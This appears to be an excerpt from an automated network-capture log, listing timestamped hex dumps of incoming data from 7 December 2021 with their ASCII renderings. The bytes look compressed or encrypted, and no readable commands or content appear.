                                                                                              2021-12-07 12:39:07 UTC2047INData Raw: 7f 7e 28 c6 fd 27 a5 fb c6 aa af 88 f7 4f e5 0a 1f df 9f f2 3c e8 ff 64 2f 2c 1a 3c d2 9d 78 ad 3a 4d e8 5f 92 26 a6 b0 ff 5f a0 7f 11 9a f4 9e 94 3a a5 fd 08 ff 7f 56 23 ee 7f af 56 36 fe bf 0c 9a 02 f0 1f 36 e8 d8 bc 68 a8 ae bd d2 a0 44 ab c3 6e da 51 e2 da e6 1b 79 56 06 f9 37 fd 42 38 ff 74 06 7a a4 dc 63 da 96 77 54 fd 43 5b 7e ca 7e a8 54 1b b9 a6 d7 34 90 f8 fc 30 a9 ea d9 82 4d 91 fa 27 8e 3e 2b d7 d5 24 a7 54 c4 ff cf 79 ff c1 dc d1 4f 82 b7 25 30 ff 98 a4 30 c4 fc 7f bc 28 2b 91 f1 c6 c7 1a 77 e4 1f 5d d6 c3 fc e3 23 db f9 db 29 16 86 4b b9 ec c1 a6 ab 4f 99 54 1c 7e 64 9e 8d 16 4a 9b 89 c6 fc 63 1c fc a7 20 86 d0 a2 69 dc ff 9a 75 fc 93 fa b6 aa f4 f1 1b a1 ca d9 c0 bf 11 ca d1 41 cf 49 23 f1 57 ff cf 7a 68 2e 96 a8 ff e7 dc 64 a5 a2 71 fe c3
                                                                                              Data Ascii: ~('O<d/,<x:M_&_:V#V66hDnQyV7B8tzcwTC[~~T40M'>+$TyO%00(+w]#)KOT~dJc iuAI#Wzh.dq
                                                                                              2021-12-07 12:39:07 UTC2055INData Raw: 11 af fe 61 cf 7a fb 9b b5 9d da 2d 9e 98 ff 2d b1 f3 07 aa c6 10 fc 3f 1f f0 9f 2e 6f d7 52 d2 ef a7 f9 99 91 6a 6f d7 39 23 5a 38 16 f7 5d a6 6b 79 e0 b3 10 fc 6f 05 f5 22 0a 64 0c 18 1f ea f2 65 5d 7f fd 80 6b 4a ad ec 1b f0 ff 6e a9 17 b4 0a 86 13 2b 55 3e d8 ff 62 5f c9 bb 96 9e 5f f4 ba cb 31 ff 90 da 9d d9 97 ce 9c f4 b8 e4 1b 73 d4 d3 1a ab df 7e 61 d0 ff b0 71 47 3b 3d cb 10 ce ed 16 51 b3 e1 e9 70 20 fc 5f 18 a6 b6 5b b9 cc 62 fe 35 31 b6 eb b9 d3 e0 91 6a 62 fe ed dc 15 fe 42 b1 3a c9 2c 3d 45 a8 66 c7 51 d3 db 19 ef 02 e1 ff 91 30 ba 67 a2 cc 6b 06 fa 07 f6 d3 7f 56 7b 5e b8 4b 92 9e c4 fe 87 af ed 3f c7 db 3d 4c 39 85 43 7d b4 36 5d bb ab 69 ef c9 ef a0 b5 2b f9 20 de 14 a2 aa 1d f3 72 55 aa 08 fe ff cf b7 2c 0b df 9b 7f e6 b0 0d fa 87 4d 1e
                                                                                              Data Ascii: az--?.oRjo9#Z8]kyo"de]kJn+U>b__1s~aqG;=Qp _[b51jbB:,=EfQ0gkV{^K?=L9C}6]i+ rU,M
                                                                                              2021-12-07 12:39:07 UTC2062INData Raw: 60 cd ac 77 d0 0a e1 7f f7 d4 2d 64 e1 27 f0 2f bb d6 95 01 88 80 19 fd 30 ff 90 70 24 89 81 ff 4b 56 83 0f 85 84 bd d3 ea 05 61 aa 43 db c9 af 76 4b f8 0f 6b 83 ff f1 85 59 ae 62 f4 3b f2 2f 23 25 0f 8a d6 2b be 3c 31 6c a3 68 54 de 0b ff 93 a1 1c af b5 fd 5f d3 ff 4a 1b 02 ff 53 be ed af 16 af 24 90 5c 83 f9 c7 5d 45 32 4e bc 7f 15 46 63 75 09 0e fc 7a 1c cf 50 ff fc 2c db 37 ff ca ef 86 b8 2d f0 3f cd db 85 5f 6d 3a 5d ab e9 c5 b3 f5 c6 24 35 9e f5 24 6d bc 7b 7b e8 76 ac 85 71 b8 ab b3 cf 52 55 65 42 97 56 6e cc ec b5 74 55 0e c2 ff e8 0b fa 7f 2e d5 ad aa 7c 07 ff 21 fc 2f 0c 92 bd 03 86 f8 8b 77 b6 9c fc b8 28 ce 14 0d ff 0b 87 ca 20 a9 5e 76 e4 ff 10 f9 2f e2 02 c0 bf c3 14 ba bc 32 ed 88 f9 6f ae db 35 bc 7f 97 ea ba 0d 6d 02 fc c8 32 31 ff e4 b0
                                                                                              Data Ascii: `w-d'/0p$KVaCvKkYb;/#%+<1lhT_JS$\]E2NFcuzP,7-?_m:]$5$m{{vqRUeBVntU.|!/w( ^v/2o5m21
                                                                                              2021-12-07 12:39:07 UTC2070INData Raw: 0b 52 02 ff bd fb 14 fa 87 2c a5 b4 fa d9 1a 21 e4 3f cc 5e 36 80 ff ff 2f 42 ff f6 18 f3 4f b3 cf 3f 6b d1 ff 98 a6 52 4b d9 bc 79 4d 4b ad 5d e2 cd 55 79 7e f7 5a fe 73 df 68 a3 fb f5 06 f0 5f 0e b4 69 22 ff 67 7a d2 17 fc 27 6d 3b 59 c9 01 c1 07 83 d6 c9 5c a1 b6 af 8e c5 36 06 25 9b 58 da d6 97 0c 41 ff 4e ba 28 f4 92 65 f6 f7 ce ec 5e 9f 01 6d 31 f8 9f 5d cc d1 04 fe 59 44 f8 3f fa 5b f5 83 ff e7 3f 3e d4 3e 3c 8a f9 47 d0 ef 3c 3f e3 c3 f0 7f 8a 64 c9 36 73 92 04 fe 7d 46 3e 93 0d fc 4f c5 9b 75 63 71 37 2b de e0 fc 2f f0 6e 9f f4 fe 89 fc bf 7a 2f 87 17 53 d7 b0 ff 5c 53 69 92 cd 3e a2 7d af 90 7f 70 2b d3 93 e5 2c e6 ff 0c bf 99 24 79 09 fc 37 ef 6f fe 55 e2 13 f4 ff 5c c3 8a 57 0c 76 ba 6f 0a bd 62 3f 8b fe 3f c4 1e f8 f7 fb 36 7d a2 fe 6f 42 fd
                                                                                              Data Ascii: R,!?^6/BO?kRKyMK]Uy~Zsh_i"gz'm;Y\6%XAN(e^m1]YD?[?>><G<?d6s}F>Oucq7+/nz/S\Si>}p+,$y7oU\Wvob??6}oB
                                                                                              2021-12-07 12:39:07 UTC2078INData Raw: fc db 0d cc 7a e8 ff 76 8e e4 61 fe ef 7d f1 87 cb 8d 67 83 f2 ac eb fe c7 9f 81 7f ea b1 66 39 5f 4a 8a 26 ab 06 ff 3b 48 d8 c8 e2 e3 59 dd 1a af f7 41 8f 86 33 1c d4 d4 e2 b0 7e 15 31 5e e4 3f 8e 9d 01 ff 85 92 62 a5 18 f3 9f bd f5 81 9b f4 1d 35 47 49 88 fc 9f 21 8f 64 6a 17 6b ec 7f 99 96 9d 0d 91 ff 5c e1 2c 46 01 ff a3 13 73 bc c5 81 43 7c 5c 17 ef 21 ff cb 9b 7c 95 62 34 d9 f3 94 02 a9 f6 13 bb 35 ff a3 0b aa 0c e0 ff 7f 01 fe 3f e9 0a fe eb a2 09 c1 7f d8 82 fc d7 df d0 3f 29 5c 6e da 50 fc 04 f5 cf 8e a2 b5 fc 07 af a9 ec 6d a4 f9 c8 7f 67 45 78 26 91 7f 62 14 a4 6e b1 b3 eb 5c ba 8b 83 37 f8 af 3e 66 3c 95 99 73 74 2c ad f6 e5 92 bb a9 5e 13 f9 9f bc 57 5b 0f 5a b7 db 5a 42 ff 2a f6 85 92 71 29 ef fe c8 1f e2 fc 93 03 ff be b3 7d d0 40 c3 c8 5d
                                                                                              Data Ascii: zva}gf9_J&;HYA3~1^?b5GI!djk\,FsC|\!|b45??)\nPmgEx&bn\7>f<st,^W[ZZB*q)}@]
                                                                                              2021-12-07 12:39:07 UTC2086INData Raw: c1 1d e9 fa 7d 55 da f6 d9 7d ce bc 3d e3 5f a3 a5 9f 58 fa 9d 9a be f0 a4 08 34 db d0 6b d3 da d2 6b 8f 66 6a 13 8c dc 7f 6f a0 24 23 d4 f2 8f fe 89 d4 38 57 4f 15 17 ad c1 87 91 7a 5c 9f 29 84 e8 d5 4d 41 8d a5 5f e7 23 1a b8 ad 6f 93 4d f8 8d 11 39 d9 64 31 1d 1a 78 5d a0 63 ad aa 52 82 fb 4f 88 07 fc 6f ee 03 ff b1 95 14 f8 bf 43 1e 7c 01 de ed c2 66 2f e5 25 9c 10 fe a3 db aa 16 c6 8d cd 93 40 c2 f9 64 d8 7f 6b 7b 5c 6e e4 51 b9 d4 b0 27 ed 53 41 03 f7 5f 0e fe 58 5b 89 24 16 e0 9f ae f9 a8 a9 2c 81 92 a9 1e 87 a5 48 fe d5 1e 7c ff 87 31 a2 af f3 e6 59 fd 8d 5f 9d fa 7f 77 30 c2 fe eb d5 4b e0 7f 84 47 8b 26 21 fa df d4 fb 6b 8c db 8a e1 b4 cd 4b 9c 81 56 e2 7a 22 42 1a 6c bf 9e dc 32 c1 8d b6 4a 10 5b 83 f3 9f 2b bd 46 a5 4d a1 08 29 ca e6 c9 b6 fc
                                                                                              Data Ascii: }U}=_X4kkfjo$#8WOz\)MA_#oM9d1x]cROoC|f/%@dk{\nQ'SA_X[$,H|1Y_w0KG&!kKVz"Bl2J[+FM)
                                                                                              2021-12-07 12:39:07 UTC2094INData Raw: e3 41 74 4e 3f 90 e8 37 bc ff a6 95 47 35 b7 52 ce a7 19 28 9f 18 3c e5 7b 55 93 df 4f cc 75 01 f4 cf 2a 4c f7 af 50 ee d2 a2 02 fe af ff 2b 39 57 49 5d 1c f0 ff 41 de 59 ee d7 9f 61 fe 99 35 40 f8 5f 8a 5c 7e c8 fd b7 fb 0e f4 ef 93 38 e7 bd 7b e9 d7 53 5b 79 1b 13 bd 37 e7 d7 d5 8b 30 0d ea 88 c8 6d 5a 6e e6 47 f1 ad af 0b 15 e6 fa bd 02 fc e7 6e 5a db 5d 1d 62 98 ff 74 ef 6e 19 b7 44 b7 ae 94 5e 88 2e 5f 00 ff 03 d3 de 0c f0 3f 18 f2 79 43 3f f9 8a 17 f0 7f 92 db 0a e0 7f ad 1f c8 04 fe ff f7 d4 d0 e0 fd fb 42 97 c8 1a 6b 6c 0b fb af 86 0d 3f cf 2d 24 ff 0a c1 3f 28 5b cf fc 6f 87 42 e2 3c 74 9a e8 37 d9 6e 43 ff 6f 34 28 4f 7d b6 ff d6 9f 26 15 0e 83 f9 e7 0b 53 41 6d 5f 0a f8 9f 6a 24 b1 45 c9 74 10 65 4d 10 67 dd b7 fd c5 1c 6d de 61 3c f6 4f ff ff
                                                                                              Data Ascii: AtN?7G5R(<{UOu*LP+9WI]AYa5@_\~8{S[y70mZnGnZ]btnD^._?yC?Bkl?-$?([oB<t7nCo4(O}&SAm_j$EteMgma<O
                                                                                              2021-12-07 12:39:07 UTC2102INData Raw: 3b f0 3f 38 f5 ff 41 d5 cd 87 f7 ef 4e a8 1a e7 b8 2a e8 5f 77 f9 b3 41 ff b2 bc 82 e8 5f a4 a0 ff 89 9f e9 0e 77 05 fd 3b 32 ff 6e cd b9 dd 91 3e 06 2b d5 31 03 8f 5d 33 57 e8 7f 84 d2 03 39 8d 27 6d eb 78 08 c9 a2 f5 1c cd ca cf f2 2f ca a5 af 43 fe f9 d2 f5 47 81 3f 3e 5c fa 29 a1 c0 86 77 89 ce 49 fe f1 c4 23 12 5e 25 69 d0 7f d6 fd a2 09 9a da f3 71 96 10 c8 77 4e b9 fc c9 8f d9 80 f0 24 0d f2 df c7 f7 e7 4c f7 34 e8 09 cd c5 32 19 aa 2a b2 ac 8b 02 aa 8a 61 ff bb ee b1 2b 53 37 88 6f d0 a1 c5 27 15 74 a5 e0 59 05 de 68 f5 de 6b 45 61 4b aa 02 9f 2e 29 ef df 7e 58 f2 86 27 b8 07 ad 5c cd c3 be 5f 37 d4 28 69 be 27 ab 7c ac 10 24 9a 5e 4d fa 12 31 07 fa 67 d9 98 a7 9c 28 fb 15 55 cb 6b e8 31 90 7f 3a 2a fa 94 63 b8 e2 fd 55 fe 78 25 8e 3a 03 8d 4a ad
                                                                                              Data Ascii: ;?8AN*_wA_w;2n>+1]3W9'mx/CG?>\)wI#^%iqwN$L42*a+S7o'tYhkEaK.)~X'\_7(i'|$^M1g(Uk1:*cUx%:J
                                                                                              2021-12-07 12:39:07 UTC2109INData Raw: 29 f3 16 a5 de bb 1d fb ab 8e 25 d3 d4 4d 47 7d 44 30 96 e6 ba ff ec ef f3 b0 ff f0 5d 3a 02 fe e3 cd c3 56 44 ff aa 54 23 04 f8 3f 6e d9 e5 88 20 8f 66 d5 9f ce 0d f5 02 62 49 a4 d1 83 ea 9f 55 67 4d 79 a8 09 db 96 bf b3 0d 91 b0 db 14 80 ff 6f 84 3b e0 ff 6b 9d a7 fa a7 b9 4f 97 80 ff c2 05 fc 97 61 d5 60 d2 cc b5 2b b4 c6 c4 fb 0d e8 66 83 b7 0c 9c 76 c1 ff 5a c5 25 2f e4 a0 1a f6 5f d5 e9 2d a6 61 c5 c9 ba 37 7f 26 7a 24 5f c9 d5 c4 f6 36 b7 12 4c f5 f9 d9 09 fc 47 0d cf 30 74 2a f0 7f 27 04 fe 93 be 59 ea 97 c4 47 e4 2b a9 01 03 42 64 81 83 d7 52 40 ff 3f d0 da 2a 21 7b a3 bf 74 ae 76 f6 01 ba 6e 95 4f 71 a8 a2 4c 3f 91 3c 93 e8 ad 06 35 6a b4 77 29 b5 d3 cb d1 92 fd 4f c0 ff f4 2e 11 e4 bf b5 7f f5 57 39 2e aa 31 d6 e9 ba 62 be 65 4d 0c fe cf 05 e0
                                                                                              Data Ascii: )%MG}D0]:VDT#?n fbIUgMyo;kOa`+fvZ%/_-a7&z$_6LG0t*'YG+BdR@?*!{tvnOqL?<5jw)O.W9.1beM
                                                                                              2021-12-07 12:39:07 UTC2117INData Raw: 71 a7 7c 6b 9c 10 ee 3f 91 b6 55 b7 55 74 f8 ff c7 cf 66 13 c5 17 f3 d6 a3 9a 90 2f a3 c1 fb c7 78 d8 1c 54 93 4c 28 d5 e7 e0 f5 04 f8 bf 94 8a a6 8a 69 fd 7b 33 ce 76 da b8 63 d5 b1 b7 80 ff 6d fd 7d bd 5b 80 42 54 53 d9 a4 4f 2a 4b a6 05 45 5c 69 8c 0d f2 6f 43 ce bf 46 f4 6f dc 57 da 08 08 0d 31 48 61 fe 89 dc 36 0b 0e c5 91 d0 27 4f 71 5c f8 15 a3 07 f9 d7 db a0 c7 30 6f 23 de 6f 9b 2b 37 04 fe af 60 c1 ff c7 d8 7f ff 73 fd 86 fd e3 78 48 91 91 3d 32 0a 21 23 59 11 42 91 2d 54 56 f6 5e 51 56 c8 26 64 cf 28 3b 84 50 51 99 59 21 65 16 b2 f7 2a 4a ca 4c 46 7c 8f c7 f3 f1 e2 ba 9e d7 e7 fb c3 fb 2f 70 7b 3a cf c7 71 1e c7 7d 1d 01 6f 06 1e 07 0d 43 fe cb 1b c8 7f 79 39 0c fb ff 18 23 72 72 5b 8c 21 ff 66 29 de 7e f1 51 3c ec bf 95 dd 34 b7 cf 37 88 ba 61
                                                                                              Data Ascii: q|k?UUtf/xTL(i{3vcm}[BTSO*KE\ioCFoW1Ha6'Oq\0o#o+7`sxH=2!#YB-TV^QV&d(;PQY!e*JLF|/p{:q}oCy9#rr[!f)~Q<47a
                                                                                              2021-12-07 12:39:07 UTC2125INData Raw: e8 4c 98 bc 7d 3e 0e fe 3f 31 ba d4 8b 35 e0 9f f4 aa d9 31 56 77 63 77 16 d6 e7 3a 4b 1c 8e 93 78 69 47 31 ba d1 a0 20 f8 6d 8a c8 94 eb 0f 67 c8 3f 7f f9 80 ca d3 e6 3b ae 11 a9 bd 39 e4 9f 7d 13 95 ca 99 d8 00 fd b7 0b a1 44 31 e9 0d 7d 97 0e c8 3f 04 ff a3 13 9c 3f 77 0a 26 ff c5 86 f4 7b 37 f8 5f 98 8a 60 ff f1 a2 26 4f 32 92 7f ab b7 a2 e4 b2 34 02 fc 7f 4a 33 e4 bf 9a e6 fd f5 cb 3d cb 01 bf 3f 99 b9 c2 ca 61 ba e5 39 77 c4 b1 cd 25 d5 c1 3d e9 69 fd 0b d6 df 4e 35 92 7e e6 be d5 55 2d 13 3f a9 ef 2a c5 13 0d df ff a8 52 1d f9 a4 8c 4b 99 ea ac cb 35 8d a8 bd 79 d7 c5 1f f7 77 66 22 e4 94 93 98 ca 45 64 71 b6 b2 38 40 ff 71 6b cf 9b 45 5e 69 6a 39 10 f2 bf 35 45 aa 2f 9a cd d9 c3 fe b7 80 49 22 2c ff 67 de 49 67 50 dd 71 2f d7 d4 5a 11 d2 3e 79 fb
                                                                                              Data Ascii: L}>?151Vwcw:KxiG1 mg?;9}D1}??w&{7_`&O24J3=?a9w%=iN5~U-?*RK5ywf"Edq8@qkE^ij95E/I",gIgPq/Z>y
                                                                                              2021-12-07 12:39:07 UTC2133INData Raw: 12 d9 96 bf ce 2f db 3e 27 23 fb 1f ce d9 aa b1 f5 ae 37 0b bf c7 0d 2d 4c c0 3d 87 ef f1 16 f2 9f b9 f9 c7 81 ff db d4 02 fd eb 17 e0 3f a2 d5 4b f4 fd a0 ff d9 eb f3 38 b5 58 9f 44 44 e2 7e a1 b4 1a f2 bf 1f 4b 8f 43 fd ff a6 a8 2a a6 cf 14 b9 12 05 fd 4f af 86 7e 2f d1 1c 2f 9b 07 e8 3f 79 17 f6 36 4b 88 87 07 fe 81 ff f1 4d e5 93 05 26 8f bf ad e1 f5 7d f9 d0 ff 98 f7 4a a1 fa 1f 7a ca 57 b6 b0 ff a8 b5 0e f2 af e6 0a 10 fd db 1a 2d f8 1f e1 fd 3f 5f 4e 6a ff 00 f8 df 84 cd 7f ec ed c0 ff 2f 43 fe 09 3f 73 1d bc ff 89 e6 bf 09 e7 e8 bf 9e eb ee 54 e8 96 4b c7 01 fd 5f 51 7e 02 f8 ff 70 c4 8f 00 fe db 45 13 0e f9 5f a3 3f be c3 fe 53 42 fd 54 c8 3f d3 23 34 5a fe a4 33 94 a8 62 5d a2 9a 38 51 fd 96 f2 ba 0a 05 3f e4 ff b2 5d 26 07 fd cf 37 9e a1 06 47
                                                                                              Data Ascii: />'#7-L=?K8XDD~KC*O~//?y6KM&}JzW-?_Nj/C?sTK_Q~pE_?SBT?#4Z3b]8Q?]&7G
                                                                                              2021-12-07 12:39:07 UTC2141INData Raw: fa cf 60 5a e3 a5 ad 2a be c6 06 56 d0 3f d0 95 bd 76 f1 b7 77 ef 5d 67 76 83 fd 3f 75 77 e4 f8 b5 cd ab 5e 36 b3 1f 21 f6 17 9a f0 b6 06 fd 4f 7d 4f 52 2d e8 3f ad 36 d7 14 84 78 63 da 7b 22 07 8f d1 93 10 a4 7a 9c 71 fd be 7a a6 2f 54 18 f4 1f 3f bf 3e 1a 66 48 c3 97 d9 4d 95 86 fc 53 f3 6b a6 f7 81 ff 65 08 66 da 04 fd b3 d3 16 d5 d7 57 77 fe f2 ca 51 2d e6 16 dc b6 3c 5b 03 fe ef db 4f 26 4b 60 ff a3 72 ee e9 67 d7 ab f9 29 d4 8d af ad 59 b4 93 3b f9 d2 b9 78 9d 2c 2b 99 cc 87 fd 47 97 c7 dd 28 8e 95 6b 5f 8e 5e f0 ab da 7e da 7f e1 62 28 ee 0f 7b c7 57 8c 48 fe dd 87 85 e0 fb 73 f7 59 77 23 53 ae b0 15 2f ab b6 f6 8b f6 37 d6 28 0a 21 fb ff 70 c4 82 5e d3 bc cb 26 91 1a b9 b4 bd 7a f2 cc d2 38 f7 66 e9 99 3f 6f 41 ff 96 3f 9a 23 33 01 f4 57 21 91 e2
                                                                                              Data Ascii: `Z*V?vw]gv?uw^6!O}OR-?6xc{"zqz/T?>fHMSkefWwQ-<[O&K`rg)Y;x,+G(k_^~b({WHsYw#S/7(!p^&z8f?oA?#3W!
                                                                                              2021-12-07 12:39:07 UTC2148INData Raw: 54 ff e2 8b d1 bf 88 13 7f 53 32 05 fe f3 59 2b f1 09 35 cd 6f 54 f2 71 90 7f 65 2f 2d 07 f9 f7 ba 26 89 0e 90 ff 37 5e 9f 49 13 0d fc 2f 99 fd 11 63 36 02 25 e3 db 63 44 22 8c e1 f2 3a 2e aa 55 23 86 c7 77 60 ff 2f c7 61 a6 e5 1a 45 11 41 97 bd ca 67 7d 8b a9 52 bf 97 52 22 83 19 57 d8 20 ff 62 66 6b 73 0b f2 ef a2 6f c0 fb 0f fa 37 e1 44 63 06 d0 3f 2d 28 ac aa 05 29 dc c2 ea ff 56 77 f7 fb 3f 89 7a e8 ff c6 6a a0 ff 0b 46 fb bf 58 b4 ff 7b 72 18 d3 ff ad e2 34 1b 89 42 ff 27 1e b6 12 54 df 8b ea df 96 31 fa 37 56 3f 78 ff 41 ff a1 e2 37 52 0b fd 0f 65 d0 7d e0 bf 6e a2 fc 57 1b 86 ff 2a 22 1f bf 64 3d 41 f5 5d dd 82 89 15 be ff 68 3a 72 d8 7f 4e f4 83 95 f0 f5 17 a9 29 9e 14 d8 ff be f4 2f de 49 2c 70 51 8e f6 b4 d8 33 f8 fe f1 ec 56 fa d7 ac 24 d0 f9
                                                                                              Data Ascii: TS2Y+5oTqe/-&7^I/c6%cD":.U#w`/aEAg}RR"W bfkso7Dc?-()Vw?zjFX{r4B'T17V?xA7Re}nW*"d=A]h:rN)/I,pQ3V$
                                                                                              2021-12-07 12:39:07 UTC2156INData Raw: 8d 61 fe 99 c9 3a 4c 41 b8 8b 85 7f 5d 38 c0 bf 56 10 fc 6b f9 11 e0 5f ef b1 f0 2f 9a 03 fc 4b 07 a9 ff 0e 0b ff 1f fc 2b e9 00 ff aa 42 f0 af 16 6f fd 1c 17 14 ff 52 43 f1 2f 69 14 ff 7a 1a 3d de 8e e0 5f fe d5 30 ff e3 81 fe 13 ab ff 55 3f e8 7f dd 91 fe 57 cf f0 ff f6 bf 87 0f fa df 3d a4 ff 75 ba 08 fd af 01 56 ff 3b 7a d0 ff 6e 22 fd 6f a6 a0 20 ee 27 b4 ff a5 46 fb df 3c b4 ff d5 90 6f a4 46 fa 5f 3e f2 14 1f 4f 2c ff bf c1 9d 7d ff bf 2a 82 7f 31 66 80 ff ff 3c 96 ff 9f f8 d6 be ff 7f 1e f2 5f 0b 46 a8 c0 ff 6f 8c fa ff 3b 50 ff 3f 23 11 c6 ff ff e0 e9 d2 e4 22 f8 ff a3 a3 33 ba d9 74 b1 f0 7f 99 03 fc ff 39 82 ff d7 1d 4e 55 2d c1 d2 bf f0 37 ec eb 5f 2e 21 f8 57 8c f9 de ba 33 96 ff 93 2b 65 df ff f9 f9 14 e8 5f 98 74 c1 ff 59 80 85 7f 3d 38 c0
                                                                                              Data Ascii: a:LA]8Vk_/K+BoRC/iz=_0U?W=uV;zn"o 'F<oF_>O,}*1f<_Fo;P?#"3t9NU-7_.!W3+e_tY=8
                                                                                              2021-12-07 12:39:07 UTC2164INData Raw: 87 3b 1d 3e 9d 6f b5 8f 35 97 f7 0e ca 23 52 0d f2 79 3a d0 20 ce 2f 7f ea fd 96 da 4b 46 53 92 af c0 e9 cf 79 64 0e f7 3f fb 1f 96 06 2e 0f a2 ab 6d 22 c8 d1 5e 3b e1 76 f8 11 55 28 23 bf 4f f6 18 59 72 94 4e e0 66 26 ec db ce 5e a0 f3 cc 2d de 5f 43 c1 9c 27 17 8d 3b 14 ae d0 ec 97 e8 a0 c2 fc bc 84 89 94 4f 87 62 b0 67 47 27 f3 19 0d cb 5f f7 f8 f8 75 50 93 e1 ad 87 02 c5 0f 7d ef 8d c9 a5 9f eb 38 09 89 da 74 18 1e 6c 2b 8a 66 e6 ca d9 87 bd a1 fe 21 4d ad 4b 3c ae 38 1e f6 7c ea 75 05 ad d0 07 8d 90 ac cf 1f 3a b8 31 c2 07 d6 6c 7d 62 85 4e 72 a4 9e 65 49 92 79 f1 27 68 08 8a f5 2d f1 3d d5 b0 3d 31 63 1c 50 bd c5 f9 0b 3b cf 74 83 a5 e8 51 e2 95 4c 04 6d d7 9c 39 fa 2a 51 4f 8c 66 2b eb d3 78 4b 1b bc fc 83 1b a1 fa 61 78 0f 1a 37 dc 49 ab c8 da fa
                                                                                              Data Ascii: ;>o5#Ry: /KFSyd?.m"^;vU(#OYrNf&^-_C';ObgG'_uP}8tl+f!MK<8|u:1l}bNreIy'h-==1cP;tQLm9*QOf+xKax7I
                                                                                              2021-12-07 12:39:07 UTC2172INData Raw: 9b 74 a8 fe c3 81 0c 54 ff ef ee 6e 9a ea 9b 8c 3f 50 ff 83 20 a8 ff d9 70 ea 0c 6a e5 f1 13 a8 fe 7b 7f a2 d6 9c 8c 79 ff 60 26 3e f4 fe 59 c2 1f ea 7f d5 59 a0 af f7 2c 25 11 ea 7f f1 19 aa 7f 5e f1 aa a5 92 f4 d0 06 aa 7f 5e a7 e6 4a 5b 17 17 47 54 c6 6a 0c f5 7f af 37 a5 75 59 0f 7f 7a 44 a7 09 d6 3f f8 43 27 c3 37 b0 5e 2d 7b 8e 43 f5 1f 58 32 0a 93 15 7f 27 c8 ba 7f e1 9d 25 5e cd f6 79 d5 c4 c0 be ad bc 5b 7d 13 aa ff 6d f4 a1 3c 29 ac d7 96 ef da 97 c0 08 5a ff e8 73 be e2 aa ce ac 5f ae 39 84 ea 3f 18 10 14 9b 99 8a be ff dd 51 40 0f d5 bf b1 8a 4b 2c d6 91 1e 3f 65 c6 8f 47 a6 63 5c 6b c9 c0 87 36 40 07 50 26 78 6d af 37 d0 90 9c a1 fe 57 7d 5f e5 71 d7 d3 a1 fe 37 be 50 ff 0f e4 1d bf 14 fd c5 61 a8 fe 3f d7 8f 37 f2 54 71 24 7e de 39 ce 50 ff
                                                                                              Data Ascii: tTn?P pj{y`&>YY,%^^J[GTj7uYzD?C'7^-{CX2'%^y[}m<)Zs_9?Q@K,?eGc\k6@P&xm7W}_q7Pa?7Tq$~9P
                                                                                              2021-12-07 12:39:07 UTC2180INData Raw: d8 f7 73 9c 79 25 21 e9 a3 34 f0 cf a8 ce 70 a0 7e 92 e5 02 93 54 02 91 ff 70 d1 d5 95 bf ab 36 dd e5 46 e4 3f e4 cd 3d 86 5e 54 54 46 4a 44 fe 5b d0 d5 1c 79 38 f8 ee 37 f0 ef d2 cc 04 e5 19 f4 52 f8 69 68 d3 3f f9 ef 30 0a a9 12 fd 02 f8 07 ce 7f 3c 96 1c 89 34 43 81 7f 0f a1 fd 5f b4 83 cf 47 7a 78 c0 bf 40 28 ff 99 32 2a 2d f7 ca 02 ff 4e a0 f3 9f a3 77 63 ee 5f 7a 80 7f 34 07 ab 17 8e 99 77 77 3f 29 00 ff 8c a1 fd ff 2b df b4 6b c2 51 e0 1f 38 ff a4 a9 c4 5c 9e 58 06 fe 81 fd 5f e7 07 31 1d b2 35 c0 3f 42 c8 3f 7c a1 4c e6 21 76 e0 df 6a b8 59 8b 49 8a 3d 4a 8d bd 3c 22 ff 6d da 7c 0c 64 95 7f f2 02 f8 e7 55 da 56 9a 58 cd f1 9f fd cf 6b bf 98 1d e0 5f 06 74 fe c1 ff ac 94 fd f7 f0 f1 ff f6 3f 91 1d ee bd 05 fe 29 e7 0a 70 f6 a7 d9 cc 11 39 03 ff 46
                                                                                              Data Ascii: sy%!4p~Tp6F?=^TTFJD[y87Rih?0<4C_Gzx@(2*-Nwc_z4ww?)+kQ8\X_15?B?|L!vjYI=J<"m|dUVXk_t?)p9F
                                                                                              2021-12-07 12:39:07 UTC2187INData Raw: e0 9f e9 0d d8 bf 00 19 e0 5f 7e 08 ec 9f d7 26 f0 8f 9f 12 f6 cf ed 11 f0 4f 90 0e f6 ef 5e 3d f0 ef 81 3e ec 1f 15 22 ff c9 19 c2 fe f1 3b 00 ff 14 af 60 ff 68 10 f9 6f e2 3b ec 5f 37 22 ff 31 66 c3 fe 11 4b 03 ff 50 cd 60 ff 56 a6 80 7f 84 75 b0 7f 01 88 fc 97 d5 02 fb 47 39 0a fc fb 54 07 fb 97 8c c8 7f 8f 83 60 ff 50 4c 80 7f f9 56 b0 7f b8 88 fc 57 23 04 fb c7 91 0b fc fb 4b 08 fb 37 e1 09 fc ab 41 83 fd 33 cf 01 fe 21 45 c0 fe 29 23 f2 9f 3d 03 ec df 31 29 f0 cf 7a 03 f6 6f 01 91 ff ee c8 c1 fe 7d 40 e4 bf 06 61 d8 3f 7f 44 fe 33 6f 84 fd bb 12 02 fe c5 e5 c2 fe b9 22 f2 1f d1 29 ec df 8e 32 f0 8f a6 19 f6 8f f7 39 f0 4f dc 13 f6 cf f1 1b f0 cf 7b 1a f6 ef 2e 22 ff f1 5f c1 fe 11 27 01 ff 3c 43 60 ff 36 10 f9 ef c4 17 f6 af 28 12 f8 77 1a 01 fb d7
                                                                                              Data Ascii: _~&O^=>";`ho;_7"1fKP`VuG9T`PLVW#K7A3!E)#=1)zo}@a?D3o")29O{."_'<C`6(w
                                                                                              2021-12-07 12:39:07 UTC2195INData Raw: e9 7c 5b d5 91 4b e9 89 e8 fa 66 68 75 bf e5 63 d9 fb 50 d3 18 fb 23 83 eb f1 58 c8 66 4a e5 f0 bf 93 13 0d c3 fe 9d 8f 2f 0c 11 1d 94 7a 9b 70 42 8f f9 c3 c4 57 f5 f6 bf 11 ba 7b df f5 da 64 23 21 84 bb 65 ca e1 9f 5e 50 ba 6b 69 40 4e 63 ab 4e ae 3e 3e bb a7 11 dd cd a9 4c 74 85 5c 28 e7 d4 07 b0 ed dc d6 9c a4 99 4a a4 d6 69 d8 4a 0c 4d 85 99 9d 4b 66 23 6f 05 6e ef d5 3f 81 fa 7f 3b 5a 7c b2 67 18 4b 63 36 3c b9 12 b2 57 34 bb b4 47 3b 10 4b c2 dc 8e ed 5e a3 c5 ef 13 e2 2d ea d6 24 3d 69 06 b9 70 2f 7e 18 ce 33 a7 14 dc 3e de 67 e7 d3 cd 9a 26 a5 e1 59 d5 c8 0e 92 f1 f7 27 ac 0b d4 1e af 9d 51 09 98 cd 25 ce 73 f8 83 86 82 d5 36 29 34 a7 5d fd d9 55 13 59 f4 12 02 